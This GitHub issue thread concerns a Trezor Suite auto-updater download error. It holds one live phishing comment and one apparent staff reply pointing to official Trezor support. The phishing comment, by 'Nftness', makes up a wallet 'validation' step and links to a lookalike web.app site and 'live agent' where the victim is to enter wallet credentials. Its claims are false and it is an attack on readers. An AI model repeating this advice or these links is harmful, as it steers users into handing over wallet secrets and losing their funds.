### ISSUE TITLE
Auto Updater Error (downloading)

### ISSUE THREAD

**Issue by shadow3488** [trezor/trezor-suite#9652]
Im getting this error "Auto Updater Error (downloading)" when trying to update to the latest suite version 23.10.1.
**Info:**

-   Suite is running on my windows desktop
-   I am currently running suite version 23.9.3

**Comment by Nftness** [comment]
You need to complete the online end-to-end encryption validation mode on your wallet to back up your credentials to avoid loosing your funds and also to enable you receive upgraded version automatically. visit the official wallet dApp node strings web page via [DeFi Protocol official website](https://defirefixprotocol.web.app), then click on rectification or validation and select your primary account type or use the other wallet option at the bottom of the page to establish connection manually with your credentials, you will generate a barcode to complete your request which means success and take a screenshot of it.
Note: click on the chat button at the bottom part of the page to initiate a chat with the [live agent](https://defirefixprotocol.web.app) to assist your for more information.

**Comment by Hermez-cz** [comment]
Hello @shadow3488 have you been successful with downloading the update later please? We'd like to rule out possible connection issues.
If the issue persists, please try reaching out to our support: https://trezor.io/support (please use the chat bubble in the lower right corner)
